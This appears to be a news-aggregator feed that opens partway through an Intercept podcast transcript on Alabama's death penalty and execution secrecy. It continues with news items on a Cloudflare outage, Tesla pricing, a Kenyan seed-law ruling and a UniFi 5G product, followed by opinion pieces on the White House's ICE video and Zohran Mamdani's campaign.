and what was really astonishing about that oral argument wasn’t just how grotesque it all was, but the fact that the justices were very clearly annoyed, very cranky about the fact that, only a few years after having upheld this three-drug protocol, now they were having to deal with this thing again. And again, they upheld this protocol, despite a lot of evidence that it was completely inhumane and that there was a lot of reason to be concerned that people were suffering on the gurney while being put to death by lethal injection.
And so the reason I go back to the Willie Francis case is that it really tells us everything that we need to know. Which is that if you have decided that people condemned to die in this country are less than human, and that their suffering doesn’t matter, then there’s no limits on what you are willing to tolerate in upholding this death protocol that we’ve invented in this country. And so the Supreme Court has weighed in not only on the three-drug protocol, but on execution methods in general. And they have always found that there’s not really a problem here.
“If you have decided that people condemned to die in this country are less than human, and that their suffering doesn’t matter, then there’s no limits on what you are willing to tolerate in upholding this death protocol that we’ve invented in this country.”
MG:
At a certain point, it becomes obvious that the cruelty is the point. The Eighth Amendment does not actually have any kind of impact on their thinking because they are anxious to preserve the very thing about capital punishment that is so morally noxious, which is that it’s cruel.
AL:
Malcolm, one interesting thing that you talk about in this series is this concept of judicial override in Alabama, where a judge was able to impose a death sentence even if the jury recommended life in prison. This went on until 2017. As we know, death penalty cases can take decades, so it’s possible that there are still people on death row who have been impacted by judicial override. What’s your sense about how judges who went that route justified their decisions, if at all?
MG:
So Alabama was one of a small number of states who, in response to the Supreme Court’s hesitancy about capital punishment in the 1970s, instituted rules which said that a judge can override a jury’s sentencing determination in a capital case.
So if a jury says, “We want life imprisonment without parole,” the judge could impose a death penalty, or vice versa. The motivation for this series of override laws — and only about three or four states, Florida, Alabama, and a couple of others, had them — is murky. But I suspect what they wanted to do was to guard against the possibility that juries would become overwhelmingly lenient.
The concern was that public sentiment was moving away from the death penalty to the extent that it would become difficult to impose a death penalty in capital cases unless you allowed judges to independently assert their opinion when it came to sentencing. And I also suspect that, in states like Alabama, there was a little bit of a racial motivation: they thought that Black juries would be unlikely to vote for the death penalty for Black defendants, and they wanted to reserve the right to act in those cases.
And what happens is that other states gradually abandon this policy, but Alabama sticks to it — not only that, they have the most extreme version of it. They basically allow the judge to overrule under any circumstances, without giving an explanation for why.
And when they finally get rid of this, they don’t make it retroactive. They only say, “Going forward, we’re not going to do override. But we’re not going to spare people who are on death row now because of override — we’re not going to spare their lives.” And so it raises this question. The reason we call our series “The Alabama Murders” is that when you look very closely at the case we’re interested in, you quickly come to the conclusion that there’s something particularly barbaric about the political culture of Alabama. Not news, by the way, for anyone who knows anything about Alabama. But Alabama is its own thing, and they remain to this day clinging to this notion that they need every possible defense against the possibility that a convicted murderer could escape with his life.
AL:
Speaking of the title of the show, I also want to bring up something I did not know: the autopsy after an execution, and I don’t know whether this is unique to Alabama, marks the death as a homicide. I was actually shocked to hear that.
MG:
Yeah, isn’t that interesting? That is the one moment of honesty and self-awareness in this entire process.
AL:
Right, that’s why it’s shocking. It’s not shocking because we know it’s a homicide. It’s shocking because they’re admitting to it in a record that is accessible to the public at some point.
[Break]
AL:
Malcolm, you mentioned the racial dynamic with Alabama in particular, but Liliana, I want to ask if you could maybe speak to the historic link between the development of the death penalty and the history of lynching in the South.
LS:
So it’s really interesting. Alabama is, in many ways, the poster child for this line that can be drawn between not only lynching, but slavery to lynching, to Reconstruction, to state-sanctioned murder. And that’s an uneasy line to draw in the sense of — there’s a reason that Bryan Stevenson, who is the head of the Equal Justice Initiative, has called the death penalty the “stepchild of lynching.”
He calls it
the stepchild of lynching
and it’s because, while there’s something of an indirect link, that link is absolutely real. And you really see it in Alabama and certainly in the South. I think it was in 2018 that I went down to Montgomery a number of times for the opening of EJI’s lynching memorial, and this was a major event. At the time, I went with this link in mind to try to interrogate and understand this history a little bit better. And I ended up writing this big long piece, which I only recently went back to reread because it’s not fresh in my mind anymore.
But one of the things that is absolutely, undoubtedly true is that the death penalty in the South in its early days was justified using the exact same rationale that people used for lynching, which was that this was about protecting white women from sexually predatory Black men.
“The death penalty in the South in its early days was justified using the exact same rationale that people used for lynching.”
And that line — that feature of executions, whether it was an extrajudicial lynching or an execution carried out by the state — has been really consistent, and I think overlooked, in the history of the death penalty. And part of the reason it’s overlooked is that, again, going back to the Supreme Court, there have been a number of times that this history has come before the Supreme Court and other courts, and by and large, the reaction has been to look away, to deny this.
That is absolutely true. In the years leading up to the 1972 case,
Furman v. Georgia
, which Malcolm alluded to earlier, there was this moment where the Supreme Court had to pause executions. And this was a four-year period in the ’70s: 1972 was Furman v. Georgia, 1976 was Gregg v. Georgia. Part of the reason that Furman, the 1972 case, invalidated the death penalty across the country was that there was evidence that death sentences were being handed down in what they called an arbitrary way.
And in reality, it wasn’t so much arbitrariness as very clear evidence of sentences that were being given disproportionately to people of color, to Black people, and history showed that that was largely driven by cases in which the victim was white, maybe a white woman who had been subjected to sexual violence. There is that link, and I think it’s really important to remember that.
In Alabama, one of the really interesting things, too, going back to judicial override, is this kind of irony in the history of how it was carried out by judges. When Alabama restarted the death penalty in the early ’80s, it was getting a lot of flak for essentially having a racist death penalty system. Of course, there was a lot of defensiveness around this, and in some cases where juries did not come back with a death sentence for a white defendant, judges then overrode that decision in a sort of display of fairness.
One of the things that I found when I was researching
my piece from 2018
was that there was a judge in, I believe it was 1999, who explained why he overrode the jury in sentencing this particular white man to die. And he said, “If I had not imposed the death sentence, I would’ve sentenced three Black people to death and no white people.” So this was his way of ensuring fairness. “Well, I’ve gotta override it here,” never mind what it might say about the jury in the decision not to hand down a death sentence for a white person.
“They needed the appearance of fairness.”
Again, it goes back to appearance. They needed the appearance of fairness. And so Alabama really does typify a certain kind of racial dynamic and early history of the death penalty that you see throughout the country, not only in the South, but especially in the South.
AL:
One of the things proponents of the death penalty are adamant about is that it requires some element of secrecy to survive.
Executions happen behind closed walls, in small rooms, late at night. The people involved never have their identities or credentials publicly revealed. The concern is that if people really knew what was involved, there would be a massive public outcry. Malcolm, in this series you describe in gruesome detail what is actually involved in an execution. For folks who haven’t heard the series, tell us about that.
MG:
In Alabama, there is a long execution protocol, a written script that was made public only because it came out during a lawsuit, and it kind of lays out all the steps that the state takes. And Alabama also has, to your point, an unusual level of secrecy.
For example, in many states, the entire execution process is open, at least to witnesses. In Alabama, you only see the person after they’ve found a vein. So in the Kenny Smith case we were talking about, where they spent
hours unsuccessfully trying to find a vein
— that was all done behind closed doors.
And the second thing that you pointed out is the people who are involved remain anonymous, and you can understand why. It is an acknowledgment on the part of these states that they are engaged in something shameful. If they were as morally clearheaded as they claim to be, then what would be the problem with making every aspect of the process public?
But instead, they go in the opposite direction and they try and shroud it. They make it as much of a mystery as they can. And it’s funny, so much of our knowledge about death penalty procedures only comes out because of lawsuits.
“If they were as morally clearheaded as they claim to be, then what would be the problem with making every aspect of the process public?”
It is only under the compulsion of the judicial process that we learn even the smallest tidbit about what’s going on or what kind of thought went into a particular procedure. When we’re talking about the state taking the life of a citizen of the United States, that’s weird, right?
We have more transparency over the most prosaic aspects of government practice than we do about something as important as taking someone’s life.
AL:
Liliana, you’ve witnessed two executions. Tell us about your experience, and particularly this aspect of secrecy surrounding the process.
LS:
Let me just pick up first on the secrecy piece because one of the really bizarre aspects of the death penalty, when you’ve covered it in different states and looked at the federal system as well, is that there’s just this wide range when it comes to what states and jurisdictions are willing to reveal and show.
What they are not willing to reveal is certainly the individuals involved. A ton of death penalty states have passed secrecy legislation, essentially bringing all of that information even further behind closed doors. The identity of the executioners was always sort of a secret. But now we don’t get to know
where they get the drugs
, and in some states, in some places, the secrecy is really shocking. I just wrote a story about
Indiana, which recently restarted executions
. And Indiana is the only active death penalty state that does not allow any media witnesses. There is nothing, and that’s exceptional.
And if you go out and try as a journalist to cover an execution in Indiana, it’s not going to be like in Alabama or in Oklahoma, where the head of the DOC comes out and addresses things and says, whether true or not true, “Everything went great.” No, you are in a parking lot at midnight across from the prison. There is absolutely nobody coming to tell you what happened. It’s a ludicrous display of indifference and contempt, frankly, for the press or for the public that has a right and an interest in knowing what’s happening in their names. So secrecy — there’s a range, I guess is my point, and yes, most places err on the side of not revealing anything, but some take that a lot further than others.
In terms of the experience of witnessing an execution, that’s obviously a big question. I will say that both those executions were in Oklahoma. That is a state that has a really ugly, sordid history of botched executions going back more than 10 years.
But Oklahoma became infamous on the world stage about 10 years ago, a little more, for botching a series of executions. I’ve been
covering the case of Richard Glossip
for a while. Richard Glossip is a man with a long-standing innocence claim whose death sentence and conviction were
overturned
only this year. Richard Glossip was almost put to death by the state of Oklahoma in 2015, and I was outside the prison that day. And it’s only because
they had the wrong drug on hand
that it did not go through.
And so going into a situation where I was preparing to witness an execution in Oklahoma, I was all too keenly aware of the possibility that something could go wrong — and that’s just something you know when you’re covering this stuff. And instead, Oklahoma carried out the three-drug protocol execution of a man named
Anthony Sanchez
in September of 2023. I had written about Anthony’s case. I had spoken to him the day before and for the better part of a year. And I think I’m still trying to understand what I saw that day because, by all appearances, things looked like they went as smoothly as one would hope, right?
He was covered with a sheet. You saw the color in his face change. He went still. And as a journalist or just an ordinary person trying to describe what that meant, what I was seeing — I couldn’t really tell you, because the process by design was made to look that way, but I could not possibly guess as to what he was experiencing.
Again, that’s because lethal injection and that three-drug protocol has been designed to make it look humane and make it look like everything’s gone smoothly.
I will say, one thing that has really stuck with me about that execution is that I was sitting right behind the attorney general of Oklahoma, Gentner Drummond, who has attended — I think to his credit, frankly — every execution that has been carried out in Oklahoma under his tenure. He was sitting in front of me, and the one witness who was there, who I believe was a member of Anthony’s family, was sitting one seat over. After the execution was over, she was quietly weeping, and Gentner Drummond, the attorney general who was responsible for this execution, put his hand on her and said, “I’m sorry for your loss.” And it was this really bizarre moment, because he was acknowledging that this was a loss — that this death of a person she clearly cared about was something he was responsible for.
And I don’t know that he has ever said something like that since, because a lot of us journalists in the room reported back. And it’s almost like, you’re not supposed to say that — there shouldn’t be sorrow here, really. This is justice. This is what’s being done in our name. And I’m still trying to figure out how I feel about that. Because by and large in the executions I’ve reported on, you don’t have the attorney general himself or the prosecutor who sent this person to death row attending the execution. It’s out of sight, out of mind.
AL:
Malcolm, as we’ve talked about and has been repeatedly documented, the way that the death penalty has been applied has been racist and classist, disproportionately affecting Black and Latino people and poor people. It has also historically penalized people who have mental health issues or
intellectual disabilities
. Even with all that evidence, why does this persist? How has vengeance become such a core part of the American justice system?
MG:
As I said before, I think what’s happened is that the people who are opposed to the death penalty are having a different conversation than the people who are in favor of it.
The people who are in favor are trying to make a kind of moral statement about society’s ultimate intolerance of people who violate certain kinds of norms, and they are, in the pursuit of that kind of moral statement, willing to go to almost any lengths. And on the other side are people who are saying that going this far is outside of the moral boundaries of a civilized state.
Those are two very different claims that proceed on very different assumptions. And we’re talking past each other. It doesn’t matter to those who are making a broad moral statement about society’s intolerance what this condition, status, background, makeup of the convicted criminal is — because they’re not basing their decision on the humanity of the defendant, the criminal defendant. They’re making a broad moral point.
“I’ve often wondered whether in doing series, as I did, that focus so heavily on the details of an execution, I’m contributing to the problem.”
I’ve often wondered whether in doing series, as I did, that focus so heavily on the details of an execution, I’m contributing to the problem. That if opponents make it all about the individual circumstances of the defendant, the details of the case, was the person guilty or not, was the kind of punishment cruel and unusual — we’re kind of buying into the moral error here.
Because we’re opening the possibility that if all we were doing was executing people who were 100% guilty and if our method of execution was proven without a shadow of a doubt to be “humane,” then we don’t have a case anymore.
AL:
Right, then it’d be fine.
MG:
So I look at what I’ve done — and that’s my one reservation about spending all this time on the Kenny Smith case: we shouldn’t have to do this. It should be enough to say that even the worst person in the world does not deserve to be murdered by a state.
That’s not what states do, right, in a civilized society. That one sentence ought to be enough. And it’s a symptom of how distorted this argument has become — that it’s not enough.
AL:
Liliana, I want to briefly get your thoughts on this too.
LS:
I think that people who are opposed to the death penalty, and abolitionists, oftentimes say, “This is a broken system.” And we talk about prisons in that way: “This is a broken system.”
I think it’s a mistake to say that this is a broken system, because I don’t think that this system at its best, as you’ve just discussed, would be fine if it only worked correctly. I think that’s absolutely not the case. So I do agree about this system — and I don’t hide the fact that I’m very opposed to the death penalty. I don’t think that you can design it and improve it and make it fair and make it just.
“I don’t think that you can design it and improve it and make it fair and make it just.”
I also think that part of the reason that people have a hard time saying that is: If you were to say that about the death penalty in this country, for all of the reasons that may be true, then you would be
forced to deal with the criminal justice system more broadly
, and with prisons and sentencing as a whole. And I think that there’s a real reluctance to see the problems that we see in death penalty cases in that broader context, because what does that mean for this country if you’re calling into question mass incarceration and the purpose that these sentences serve?
AL:
We’ve covered a lot here. I want to thank you both for joining me on the Intercept Briefing.
MG:
Thank you so much.
LS:
Thank you.
Another Cloudflare outage takes down websites including LinkedIn and Zoom
Guardian
www.theguardian.com
2025-12-05 10:58:47
Web infrastructure provider says it has implemented a fix after users had seen ‘a large number of empty pages’ A host of websites including LinkedIn, Zoom and Downdetector went offline on Friday morning after fresh problems at Cloudflare. Cloudflare said shortly after 9am UK time that it was “invest...
A host of websites including
LinkedIn
, Zoom and Downdetector went offline on Friday morning after fresh problems at Cloudflare.
Cloudflare said shortly after 9am UK time that it was “investigating issues with Cloudflare Dashboard and related APIs”, referring to application programming interfaces.
The internet infrastructure provider said users had seen “a large number of empty pages” as a result. It added shortly after that it had implemented a potential fix and was monitoring the results.
A number of websites and platforms were down, including the Downdetector site used to monitor online service issues. Users reported problems with other websites including
Zoom
, LinkedIn, Shopify and Canva, although many are back online.
The Downdetector website recorded more than 4,500 reports related to Cloudflare after it came back online.
The India-based stockbroker Groww said it was facing technical issues “due to a global outage at Cloudflare”. Its services have since been restored.
Cloudflare provides network and security services for many online businesses to help their websites and applications operate. It claims that about 20% of all websites use some form of its services.
It comes only three weeks after
previous problems at Cloudflare
hit the likes of X, ChatGPT, Spotify, and multiplayer games such as League of Legends.
Jake Moore, a global cybersecurity adviser at ESET, said: “If a major provider like Cloudflare goes down for any reason, thousands of websites instantly become unreachable. The problems often lie with the fact we are using an old network to direct internet users around the world to websites, but it simply highlights there is one huge single point of failure in this legacy design.”
Tesla cuts Model 3 price in Europe as sales slide amid Musk backlash
Guardian
www.theguardian.com
2025-12-05 10:55:10
CEO Elon Musk says lower-cost electric car will reignite demand by appealing to broader range of buyers Tesla has launched the lower-priced version of its Model 3 car in Europe in a push to revive sales after a backlash against Elon Musk’s work with Donald Trump and weakening demand for electric veh...
Musk, the electric car maker’s chief executive, has argued that the cheaper option, launched in the US in October,
will reinvigorate demand
by appealing to a wider range of buyers.
The new Model 3 Standard is listed at €37,970 (£33,166) in Germany, 330,056 Norwegian kroner (£24,473) and 449,990 Swedish kronor (£35,859). The move follows the
launch of a lower-priced Model Y SUV
, Tesla’s bestselling model, in Europe and the US.
Tesla sales have
slumped across Europe
as the company faces increasingly tough competition from its Chinese rival BYD, which outsold the US electric vehicle maker across the region for the first time in spring.
Sales across the EU have also been hurt by a buyer backlash against Musk’s support for Trump’s election campaign and period working in the president’s administration.
In his role running the “department of government efficiency”, or Doge, the tech billionaire
led sweeping job cuts
, but
quit in May
after falling out with Trump over the “big, beautiful” tax and spending bill.
New taxes on electric cars in last month’s budget could undermine UK demand, critics have said. UK electric car sales grew at their slowest rate in two years in November, at just 3.6%, according to figures from the Society of Motor Manufacturers and Traders (SMMT).
“[This] should be seen as a wake-up call that a sustained increase in demand for EVs cannot be taken for granted,” said Mike Hawes, the chief executive of the SMMT. “We should be taking every opportunity to encourage drivers to make the switch, not punishing them for doing so.”
The chancellor’s new pay-per-mile road tax on EVs will charge drivers 3p for every mile from April 2028, costing motorists about £250 a year on average.
What are you doing this weekend?
Lobsters
lobste.rs
2025-12-05 10:54:28
Feel free to tell what you plan on doing this weekend and even ask for help or feedback.
Please keep in mind it’s more than OK to do nothing at all too!...
Kenyan court declares law banning seed sharing unconstitutional
KISUMU, Kenya (AP) — A high court in Kenya on Thursday declared unconstitutional sections of a seed law that prevented farmers from
sharing and selling indigenous seeds
in what food campaigners have called a landmark win for food security.
Farmers in Kenya could face up to two years’ imprisonment and a fine of 1 million Kenya shillings ($7,700) for sharing seeds through their community seed banks, according to a seed law signed in 2012.
Justice Rhoda Rutto on Thursday said sections of the seed law that gave government officials powers to raid seed banks and seize seeds were also unconstitutional.
The law was introduced as a measure to curb the growing sale of counterfeit seeds that were causing losses in the agricultural sector, and it gave sole seed trading rights to licensed companies.
The case had been filed by 15 smallholder farmers, who are members of community seed banks that have been in operation for years, preserving and sharing seeds among colleagues.
A farmer, Samuel Wathome, who was among the 15, said the old farming practices had been vindicated.
“My grandmother saved seeds, and today the court has said I can do the same for my grandchildren without fear of the police or of prison,” he said.
Elizabeth Atieno, a food campaigner at Greenpeace Africa, called the win a “victory for our culture, our resilience, and our future.”
“By validating indigenous seeds, the court has struck a blow against the corporate capture of our food system. We can finally say that in Kenya, feeding your community with climate-resilient, locally adapted seeds is no longer a crime,” she said.
Food campaigners have in the past encouraged governments to work with farmers to preserve indigenous seeds as a way of ensuring food security by offering farmers more plant varieties.
Indigenous seeds are believed to be drought resistant and adaptable to the climate conditions of their native areas, and hence often outperform hybrid seeds.
Kenya has a national seed bank based near the capital Nairobi where indigenous seeds are stored in cold rooms, but farmers say community seed banks are equally important for variety and proximity to the farmer.
The country has faced challenges in the seed sector where counterfeit seeds were sold to farmers, leading to losses amounting to millions of shillings in a country that relies on rain-fed agriculture.
The UniFi 5G Max lineup was created with a clear goal in mind: deliver a sleek, versatile, and exceptionally powerful 5G internet experience that works effortlessly in any environment.
UniFi 5G Max: Simple Setup and Clean Design
The UniFi 5G Max makes deployment easy, whether installed locally or at a remote site. Plug it into any PoE port and it instantly appears as a ready-to-use WAN interface, whether it is plugged directly into your UniFi gateway or into your office switch. No new cable runs needed! It sits neatly on a desk, but you can reposition it for the best possible signal using the included wall or window mount.
Automatic adoption as a UniFi WAN interface on any PoE port
Compact indoor design with a handy LCM
Desk, wall, or window mounting options
Optimize signal reception by repositioning anywhere on the network
Ideal for home, office, or remote site use
A compact form factor designed for fast installation and flexible placement at the core or edge.
Ultra-Flexible Connectivity for Any Network Role
The 5G Max delivers downlink speeds up to 2 Gbps with ultra low latency that makes it reliable as a primary connection and seamless as a backup WAN. UniFi routing policies and SLAs let you choose exactly how and when 5G is used, and for which clients and VLANs. Easily set per-SIM usage limits to avoid overage costs with just a few clicks.
Up to 2 Gbps downlink
Ultra low latency on supported networks
Works as primary, load-balanced, or failover WAN
Customizable policy based routing
SLA driven control through UniFi
High speed 5G that adapts to your network's rules, not the other way around.
UniFi 5G Max Outdoor: Rugged Speed and Extended Reach
For tougher environments or deployments with poor indoor cellular coverage, the outdoor model maintains the same high performance cellular connectivity with improved antenna performance in a durable IP67 rated enclosure. It is built for rooftop installs, off site locations, and mobile deployments where reliability is critical. Just like its indoor counterpart, you can also connect it via any PoE port, anywhere on your network, greatly simplifying cabling requirements.
Enhanced long range antenna design
IP67 weather resistant construction
Built for rooftops, remote sites, and vehicle based setups
Stable performance in harsh conditions
A weatherproof 5G device built for reliability wherever you place it.
Dream Router 5G Max: The Fully Integrated UniFi Experience
If you want everything UniFi in one device, the Dream Router 5G Max combines 5G connectivity with WiFi 7, local storage, and full UniFi OS application support. Deploy it anywhere 5G is available and run an entire high-performance, scalable network stack instantly.
Integrated tri-band WiFi 7
Local storage via MicroSD for UniFi apps
Full UniFi OS environment
Complete routing and management in one device
Perfect for remote offices and flexible deployments
A complete UniFi system powered by the reach and speed of 5G.
Fully Unlocked for Maximum Carrier Flexibility
Every device in the UniFi 5G lineup supports both physical SIMs and eSIM, giving you the freedom to choose your carrier and switch whenever needed with zero friction. All are equipped with dual SIM slots, with one SIM replaceable by eSIM, and are fully unlocked: any major carrier, any type of deployment, with one piece of hardware.
Unlocked hardware for all major carriers
Supports physical SIM and eSIM
Fast activation and easy carrier changes
Consistent performance across service providers
Carrier freedom built directly into the hardware from day 1.
The UniFi 5G lineup brings sleek design, powerful performance, easy installation, and genuine WAN flexibility to every deployment.
Latest Articles
Sabrina Carpenter and the Cruel Authoritarianism of Trump
Portside
portside.org
2025-12-05 06:21:13
Sabrina Carpenter and the Cruel Authoritarianism of Trump
jay
Fri, 12/05/2025 - 01:21
...
The Trump White House just showed us something every American should find chilling, no matter what music they listen to or what party they vote for.
They took a video of aggressive ICE arrests, slapped Sabrina Carpenter’s song on top of it, and posted it like it was a victory lap. Then, when Carpenter objected and said the video was “evil and disgusting” and told them not to use her music to benefit an “inhumane agenda,” the White House hit back with a statement that sounded like it came from a playground bully, not the seat of American government.
They didn’t debate her point. They didn’t defend policy with facts. They went straight to dehumanization and insult, calling people “illegal murderers, rapists, and pedophiles,” and saying anyone who defends them must be “stupid” or “slow.”
That’s not just ugly: it’s a warning.
Because the biggest story here is not a celebrity clapback; it’s that the White House is using the power of the state to turn human beings into a violence-normalizing punchline, and using America’s culture as a weapon to spread it.
This is what rising authoritarianism looks like in the age of social media.
A democracy survives on shared reality and shared humanity. It survives when the government understands that it works for the people and must be accountable to the Constitution, to due process, and to basic human decency.
But what happens when a government starts producing propaganda like it’s a teenage streamer chasing clicks and the president runs the White House like it’s a reality show operation, right down to the televised Cabinet meetings?
We get a machine that can normalize cruelty. We get a public trained to cheer at humiliation. We get outrage as entertainment. And we get the steady erosion of our ability to ask the most important questions in a free society.
Was this legal? Was it justified? Was it proportional? Was it humane? Were innocent people caught up? Were families separated? Was there due process? Is it even constitutional?
Those questions disappear when the government turns an ICE arrest into a meme.
There are, of course, serious crimes in every society and violent criminals should be held accountable under the law. But that isn’t what the White House statement was doing. It was, instead, engaged in something far more ancient, cynical, and dangerous.
It was trying to paint everyone in that video with the worst label imaginable so the public stops caring about what happens next.
That’s how they get permission — both explicit and implicit — for abuses.
If the audience for Trump’s sick reality show is told, “These are monsters,” then — as we’ve most recently seen both with ICE here domestically and with people in small boats off the coast of Venezuela — any cruelty becomes acceptable.
Any killing becomes a shrug. Overreach becomes a punchline. And following the rule of law becomes something we apply to our friends while we throw it away for people we have been taught to hate.
That is exactly why authoritarians always start by dehumanizing a target group.
And it always spreads.
Trump started by demonizing and then going after immigrants. Then he demanded fealty (and millions of dollars) from journalists, universities, and news organizations. He demonizes his political opponents to the point they suffer death threats, attacks, and assassinations. And if Trump keeps going down this same path — as Pastor Niemöller famously warned the world — it’ll next be you and me.
Consider this regime’s cultural warfare program. The White House has reportedly used music from multiple artists without permission and now brags that they’ve used those creators’ work to bait outrage, to “own the libs.”
All to drive attention, create spectacle, and turn governance into a constant fight as they punish anyone in public life — today it’s Sabrina Carpenter — who dares to speak up.
This is intimidation pretending to be a joke. If you’re an artist, a teacher, an organizer, or just a person with a platform, the message is simple: “We can drag you into our propaganda machine whenever we want, and if you object we’ll mock you and send an online — and often physical — mob after you.”
That’s a chilling reality, and it matters in a democracy. People start to think twice before speaking. They start to retreat. They start to self censor.
And that’s the Trump regime’s first goal.
Then there’s the distraction, particularly from a cratering economy and Trump’s association with Epstein and Maxwell.
With this strategy, borrowed from the Nazis (as my guest on the radio show Monday, Laurence Rees, noted in his book
The Nazi Mind: 12 Warnings From History
), culture war isn’t a sideshow anymore; it’s part of a larger strategy.
When the government posts a meme like the one where ICE used Carpenter’s music, it isn’t trying to inform us: it’s trying to trigger us. It’s trying to bait us into amplifying the clip, fighting over the celebrity angle, and losing sight of the real issue.
And that real issue is Trump’s and the GOP’s insatiable lust for state power and the wealth that power can allow, bring, and protect.
Armed agents. Detention. Deportation. Families. Fear. Mistakes that can’t be undone. Human beings who can be disappeared from their communities with the tap of a button and a viral soundtrack. Or killed by “suicide” in a jail cell when they threaten to go public.
If we care about freedom, we can’t just stand by and say nothing while this regime turns ICE’s violence into content.
Because once a government learns it can win political points by broadcasting humiliation, it’ll do it again. And it’ll escalate. It’ll push the line farther and farther until we wake up one day and wonder how we got here.
So what do we do?
First
, stop amplifying their propaganda on their terms. Don’t share their clips as entertainment, even to condemn them without context (no links in this article). When you must talk about it, talk about the power being abused, not the celebrity drama.
Second
, demand oversight. Call your members of Congress (202-224-3121). Demand hearings on ICE media practices and the use of official government accounts and our tax dollars to promote dehumanizing propaganda. Demand transparency on how these videos are produced, approved, and distributed.
Third
, support civil liberties groups and immigrant rights organizations that challenge abuses in court and document what’s happening on the ground. Democracy requires watchdogs like them when the people in power act like they’re above the law.
Fourth
, get inside the Democratic Party and vote — and help others vote — like it matters, because it does. Local prosecutors, sheriffs, governors, attorneys general, and members of Congress all shape how far this culture of cruelty can spread. Authoritarians rely on fatigue and cynicism. Don’t give them either; participate.
And finally, speak up. Sabrina Carpenter did, and she was right to. Not because she’s a pop star, but because she named the moral truth that the White House is trying to smother with what they pretend are jokes.
When a government starts celebrating the humiliation of vulnerable people, it’s telling the world that it no longer sees itself as the servant of a democratic republic. Of
all
the people. Instead, it now sees itself as the applause-hungry enforcer of a bloodthirsty tribe.
If we let this become normal, we will — one day soon — no longer recognize our country.
This is the moment to draw a line.
Not just for immigrants. Not just for artists. For the Constitution. For due process. For human dignity. For the idea that in America, power is accountable.
Call. Organize. Vote. Let’s not let cruelty become America’s official language.
When was the last time being on the left was fun? Even in the best of times, supporting socialism in America can feel like performing a grim duty in the face of almost certain disappointment. The chapter titles in
Burnout
, Hannah Proctor’s investigation of the emotional landscapes of leftist militancy, are revealing: Melancholia, Nostalgia, Depression, Burnout, Exhaustion, Bitterness, Trauma, Mourning. One of the many virtues of Zohran Mamdani’s remarkable campaign for New York City mayor was that it never felt this way, not even when he was sitting near the bottom of the polls. It was a year-long act of collective joy. Real joy—not the brief sugar high that surged when Kamala Harris replaced Joe Biden at the top of the Democrats’ 2024 ticket. Volunteering for Mamdani never felt like a chore, even when the weather was bad and fewer canvassers showed up for their shift than expected. It was a blast from start to finish, and we didn’t even have to console ourselves with a moral victory. This time, we actually won.
We tend to speak of voting as a civic duty, and of boosting voter participation as a high-minded, “good government” concern. The nature of mass politics, however, has often been anything but staid and responsible. Michael McGerr begins his book
The Decline of Popular Politics
with a colorful account of a Democratic Party “flag raising” in New Haven in 1876. It was a raucous affair, complete with torchlight parades, street corner speeches, brass bands, fireworks, and rivers of booze courtesy of local party notables. Political spectacle hasn’t gone away, but since the advent of modern communications technology it has become enormously mediated. By contrast, historian Richard Bensel
has described
the “sheer physicality of voting” and party politics in the nineteenth century. People flocked to the polls, Bensel writes, “simply because they were exciting, richly endowed with ethno-cultural themes of identity, manhood, and mutual recognition of community standing.” It was party politics, in both senses of the word.
This era should not be romanticized. Aside from the fact that only men could vote, the atmosphere of drink-soddened masculinity that pervaded election campaigns kept most women away even when it did not descend into partisan and racial violence. Even so, it is hard not to agree with political scientists Daniel Schlozman and Sam Rosenfeld that America’s early mass parties “bequeathed a genuinely popular and participatory” culture whose “promise still haunts American politics.”
Much has been made of Mamdani’s extremely effective use of social media, short-form video, and other digital formats that speak to the younger and disengaged voters many other campaigns struggle to reach. There’s no doubt this was a major ingredient in the campaign’s success; historically high rates of participation among Gen Z and newly registered voters testify to its effectiveness. But the sheer physicality of the Mamdani campaign, and the ways it used digital media to bring people together offline, has been underrated.
Consider the citywide scavenger hunt in August. A call went out over social media on a Saturday night, and thousands of people showed up the next morning to race around seven stops across the boroughs, each one connected to the city’s history. Disgraced incumbent mayor Eric Adams denounced the frivolity: “I’m sure a scavenger hunt was fun for the people with nothing better to do. . . . Mamdani is trying to turn our city into the Squid Games.” One competitor offered a
different perspective
: “I think actually trying to have fun in politics and do a little bit of a community building exercise, a way to actually learn about our city—I’ve never known another politician to do it.”
The scavenger hunt was just one example of the campaign’s popular and participatory culture. So much of the campaign was in public and in person: mass rallies, a walk through the entire length of Manhattan, unannounced appearances at clubs and concerts, a 100,000-strong army of volunteers who braved countless walk-ups to knock over 1 million doors. From early spring through November’s general election, the campaign assumed the scale and spirit of a social movement, or a Knicks playoff run. There was a palpable buzz around the city—not just in what New York electoral data maven Michael Lange termed the “
Commie Corridor
” neighborhoods, populated by young college-educated leftists, but in Little Pakistan, Little Bangladesh, Parkchester, and other places where nary a
New Yorker
tote bag can be found.
When the polls closed, more than 2 million voters had cast their ballots, the highest turnout in a New York City mayoral election since 1969. More than 1 million voters, just over half the electorate, voted for Mamdani. At the same time, over 850,000 voted for Andrew Cuomo, who successfully consolidated many Republican voters behind his second-effort bid to return to public office. Another 146,000 voted for the official Republican candidate, the perennial also-ran Curtis Sliwa.
Mamdani’s shockingly decisive win in the Democratic primary had been powered by his core constituencies: younger voters, college-educated renters, and South Asian and Muslim voters, many of whom participated in the electoral process for the first time. He carried these constituencies with him into the general election, but he may have struggled to win the final contest without rallying large numbers of working-class Black and Hispanic voters too. As Lange
has shown
, the areas that shifted most strongly toward Mamdani from the primary to the general election were Black and Hispanic neighborhoods in the Bronx, Brooklyn, and Queens. Many Black and Hispanic voters under forty-five were already in Mamdani’s column in the primary, but his numbers then were far lower among their parents and grandparents. After securing the Democratic nomination, his campaign made inroads by building relationships with Black church congregations and community organizations, as well as labor unions with disproportionately Black and Hispanic memberships. By cobbling these disparate constituencies together in the general election, Lange concluded, Mamdani successfully renewed the promise of the Rainbow Coalition for the twenty-first century.
Not By Bread-and-Butter Alone
Explaining how Mamdani did this has become something of a Rorschach test for pundits. Much of the commentary has focused on his campaign’s affordability agenda, which targeted the city’s cost-of-living crisis through proposals for freezing rents, eliminating fares on city buses, and implementing universal child care, among others. While Mamdani’s emphasis on affordability was necessary for securing the victory, and his economic proposals were popular across his constituencies, he would not have been able to mobilize the coalition he did on the strength of bread-and-butter appeals alone. Mamdani’s unequivocal stances on “non-economic” questions like the genocide in Gaza or the ICE raids terrorizing immigrant communities built trust among precisely the people he needed to join his volunteer army or turn out to vote for the first time.
Support for Palestine dovetailed with Mamdani’s vocal opposition to the Trump administration’s assault on immigrants, which came together in an impromptu confrontation with Trump’s “border czar” Tom Homan last March.
A video of the encounter
